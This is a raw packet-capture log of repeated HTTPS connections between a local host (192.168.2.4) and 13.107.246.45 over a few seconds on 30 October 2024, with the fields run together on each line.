Oct 30, 2024 03:47:13.168097973 CET49979443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.168381929 CET49979443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.168387890 CET4434997913.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.168397903 CET49979443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.168402910 CET4434997913.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.171595097 CET49984443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.171616077 CET4434998413.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.171736956 CET49984443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.171926975 CET49984443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.171932936 CET4434998413.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.300280094 CET4434998013.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.304415941 CET49980443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.304480076 CET4434998013.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.305063009 CET49980443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.305077076 CET4434998013.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.417488098 CET4434998113.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.422202110 CET49981443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.422221899 CET4434998113.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.422837973 CET49981443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.422844887 CET4434998113.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.432740927 CET4434998013.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.432984114 CET4434998013.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.433058977 CET49980443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.433429956 CET49980443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.433465004 CET4434998013.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.433517933 CET49980443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.433533907 CET4434998013.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.437735081 CET49985443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.437787056 CET4434998513.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.437930107 CET49985443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.438291073 CET49985443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.438323021 CET4434998513.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.513293028 CET4434998213.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.515778065 CET49982443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.515830040 CET4434998213.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.516196966 CET49982443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.516211987 CET4434998213.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.543301105 CET4434998313.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.543741941 CET49983443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.543756962 CET4434998313.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.544358969 CET49983443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.544363976 CET4434998313.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.549103975 CET4434998113.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.549220085 CET4434998113.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.549269915 CET49981443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.549470901 CET49981443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.549482107 CET4434998113.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.549491882 CET49981443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.549495935 CET4434998113.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.591161013 CET49986443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.591175079 CET4434998613.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.591443062 CET49986443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.591767073 CET49986443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.591778994 CET4434998613.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.643345118 CET4434998213.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.643420935 CET4434998213.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.643524885 CET49982443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.643738985 CET49982443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.643775940 CET4434998213.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.643802881 CET49982443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.643816948 CET4434998213.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.647460938 CET49987443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.647509098 CET4434998713.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.647756100 CET49987443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.648030043 CET49987443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.648061037 CET4434998713.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.673670053 CET4434998313.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.673827887 CET4434998313.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.673902988 CET49983443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.674009085 CET49983443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.674015045 CET4434998313.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.674024105 CET49983443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.674027920 CET4434998313.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.676403999 CET49988443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.676425934 CET4434998813.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.676532984 CET49988443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.676655054 CET49988443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.676662922 CET4434998813.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.935750008 CET4434998413.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.936290979 CET49984443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.936304092 CET4434998413.107.246.45192.168.2.4
Oct 30, 2024 03:47:13.936754942 CET49984443192.168.2.413.107.246.45
Oct 30, 2024 03:47:13.936759949 CET4434998413.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.072196007 CET4434998413.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.072278976 CET4434998413.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.072344065 CET49984443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.072614908 CET49984443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.072624922 CET4434998413.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.072639942 CET49984443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.072644949 CET4434998413.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.075828075 CET49989443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.075854063 CET4434998913.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.075933933 CET49989443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.076132059 CET49989443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.076142073 CET4434998913.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.178162098 CET4434998513.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.180075884 CET49985443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.180103064 CET4434998513.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.180831909 CET49985443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.180840969 CET4434998513.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.309397936 CET4434998513.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.309428930 CET4434998513.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.309480906 CET4434998513.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.309494972 CET49985443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.309533119 CET49985443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.309772015 CET49985443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.309796095 CET4434998513.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.309808969 CET49985443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.309815884 CET4434998513.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.312959909 CET49990443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.312990904 CET4434999013.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.313071012 CET49990443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.313204050 CET49990443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.313215971 CET4434999013.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.323788881 CET4434998613.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.324270964 CET49986443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.324287891 CET4434998613.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.324697018 CET49986443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.324702024 CET4434998613.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.396724939 CET4434998713.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.397469044 CET49987443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.397492886 CET4434998713.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.397924900 CET49987443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.397932053 CET4434998713.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.418462992 CET4434998813.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.419024944 CET49988443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.419034004 CET4434998813.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.419378996 CET49988443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.419383049 CET4434998813.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.454330921 CET4434998613.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.454385042 CET4434998613.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.454438925 CET49986443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.454618931 CET49986443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.454628944 CET4434998613.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.454643965 CET49986443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.454648018 CET4434998613.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.457636118 CET49991443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.457665920 CET4434999113.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.457768917 CET49991443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.457894087 CET49991443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.457911015 CET4434999113.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.530644894 CET4434998713.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.530680895 CET4434998713.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.530745029 CET4434998713.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.530755043 CET49987443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.530807972 CET49987443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.530986071 CET49987443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.531004906 CET4434998713.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.531017065 CET49987443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.531023026 CET4434998713.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.534174919 CET49992443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.534197092 CET4434999213.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.534276962 CET49992443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.534538984 CET49992443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.534552097 CET4434999213.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.547950029 CET4434998813.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.548089027 CET4434998813.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.548149109 CET49988443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.548212051 CET49988443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.548218966 CET4434998813.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.548238039 CET49988443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.548243046 CET4434998813.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.550889969 CET49993443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.550925970 CET4434999313.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.550992966 CET49993443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.551121950 CET49993443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.551136971 CET4434999313.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.814157009 CET4434998913.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.814821005 CET49989443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.814836025 CET4434998913.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.815300941 CET49989443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.815304995 CET4434998913.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.954282045 CET4434998913.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.954330921 CET4434998913.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.954391956 CET4434998913.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.954410076 CET49989443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.954442978 CET49989443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.957808971 CET49989443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.957825899 CET4434998913.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.957840919 CET49989443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.957844973 CET4434998913.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.961901903 CET49994443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.961927891 CET4434999413.107.246.45192.168.2.4
Oct 30, 2024 03:47:14.961985111 CET49994443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.962265968 CET49994443192.168.2.413.107.246.45
Oct 30, 2024 03:47:14.962279081 CET4434999413.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.051992893 CET4434999013.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.052383900 CET49990443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.052398920 CET4434999013.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.052850008 CET49990443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.052855015 CET4434999013.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.187911034 CET4434999013.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.187980890 CET4434999013.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.188091993 CET49990443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.188335896 CET49990443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.188349962 CET4434999013.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.188359976 CET49990443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.188364983 CET4434999013.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.191034079 CET49995443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.191097021 CET4434999513.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.191185951 CET49995443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.191342115 CET49995443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.191355944 CET4434999513.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.207405090 CET4434999113.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.210129023 CET49991443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.210145950 CET4434999113.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.210572958 CET49991443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.210577965 CET4434999113.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.267167091 CET4434999213.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.270672083 CET49992443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.270695925 CET4434999213.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.271255016 CET49992443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.271261930 CET4434999213.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.315460920 CET4434999313.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.315953016 CET49993443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.315987110 CET4434999313.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.316528082 CET49993443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.316534042 CET4434999313.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.341501951 CET4434999113.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.341567039 CET4434999113.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.341736078 CET49991443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.341798067 CET49991443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.341813087 CET4434999113.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.341826916 CET49991443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.341830969 CET4434999113.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.344573021 CET49996443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.344611883 CET4434999613.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.344679117 CET49996443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.344794989 CET49996443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.344809055 CET4434999613.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.398020983 CET4434999213.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.398101091 CET4434999213.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.398231030 CET49992443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.398257017 CET49992443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.398268938 CET4434999213.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.398281097 CET49992443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.398287058 CET4434999213.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.400952101 CET49997443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.400983095 CET4434999713.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.401088953 CET49997443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.401221991 CET49997443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.401232004 CET4434999713.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.445786953 CET4434999313.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.445859909 CET4434999313.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.445956945 CET49993443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.445976973 CET4434999313.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.446000099 CET4434999313.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.446048021 CET49993443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.446141005 CET49993443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.446161985 CET4434999313.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.446173906 CET49993443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.446180105 CET4434999313.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.448996067 CET49998443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.449012995 CET4434999813.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.449141979 CET49998443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.449305058 CET49998443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.449316978 CET4434999813.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.692202091 CET4434999413.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.692837954 CET49994443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.692857027 CET4434999413.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.693542957 CET49994443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.693550110 CET4434999413.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.822511911 CET4434999413.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.822681904 CET4434999413.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.822778940 CET49994443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.822808027 CET49994443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.822825909 CET4434999413.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.822835922 CET49994443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.822841883 CET4434999413.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.825546980 CET49999443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.825582981 CET4434999913.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.825651884 CET49999443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.825773001 CET49999443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.825783014 CET4434999913.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.929397106 CET4434999513.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.929919004 CET49995443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.929943085 CET4434999513.107.246.45192.168.2.4
Oct 30, 2024 03:47:15.930375099 CET49995443192.168.2.413.107.246.45
Oct 30, 2024 03:47:15.930381060 CET4434999513.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.061347008 CET4434999513.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.061439991 CET4434999513.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.061520100 CET49995443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.061842918 CET49995443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.061862946 CET4434999513.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.061881065 CET49995443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.061887026 CET4434999513.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.064785004 CET50000443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.064809084 CET4435000013.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.065650940 CET50000443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.065819979 CET50000443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.065834045 CET4435000013.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.084626913 CET4434999613.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.085069895 CET49996443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.085093021 CET4434999613.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.085517883 CET49996443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.085522890 CET4434999613.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.130961895 CET4434999713.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.134268999 CET49997443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.134289026 CET4434999713.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.134722948 CET49997443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.134727955 CET4434999713.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.184954882 CET4434999813.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.185956001 CET49998443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.185965061 CET4434999813.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.186336040 CET49998443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.186340094 CET4434999813.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.216485023 CET4434999613.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.216511011 CET4434999613.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.216579914 CET49996443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.216588974 CET4434999613.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.216659069 CET4434999613.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.216710091 CET49996443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.217360973 CET49996443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.217370033 CET4434999613.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.217380047 CET49996443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.217384100 CET4434999613.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.220467091 CET50001443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.220504045 CET4435000113.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.220576048 CET50001443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.220721960 CET50001443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.220738888 CET4435000113.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.259797096 CET4434999713.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.260094881 CET4434999713.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.260169983 CET49997443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.260307074 CET49997443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.260320902 CET4434999713.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.260330915 CET49997443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.260338068 CET4434999713.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.262708902 CET50002443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.262744904 CET4435000213.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.262821913 CET50002443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.262984037 CET50002443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.263000965 CET4435000213.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.315068007 CET4434999813.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.315129995 CET4434999813.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.315203905 CET49998443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.315212011 CET4434999813.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.315265894 CET4434999813.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.315326929 CET49998443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.315468073 CET49998443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.315473080 CET4434999813.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.315500021 CET49998443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.315502882 CET4434999813.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.318332911 CET50003443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.318350077 CET4435000313.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.318439960 CET50003443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.318609953 CET50003443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.318623066 CET4435000313.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.566075087 CET4434999913.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.566567898 CET49999443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.566586971 CET4434999913.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.567156076 CET49999443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.567162991 CET4434999913.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.696713924 CET4434999913.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.696738958 CET4434999913.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.696798086 CET4434999913.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.696821928 CET49999443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.696863890 CET49999443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.697120905 CET49999443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.697143078 CET4434999913.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.697159052 CET49999443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.697165966 CET4434999913.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.700351000 CET50004443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.700378895 CET4435000413.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.700465918 CET50004443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.700644016 CET50004443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.700661898 CET4435000413.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.787852049 CET4435000013.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.788369894 CET50000443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.788403034 CET4435000013.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.788971901 CET50000443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.788979053 CET4435000013.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.917632103 CET4435000013.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.917660952 CET4435000013.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.917718887 CET4435000013.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.917732000 CET50000443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.917771101 CET50000443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.918031931 CET50000443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.918057919 CET4435000013.107.246.45192.168.2.4
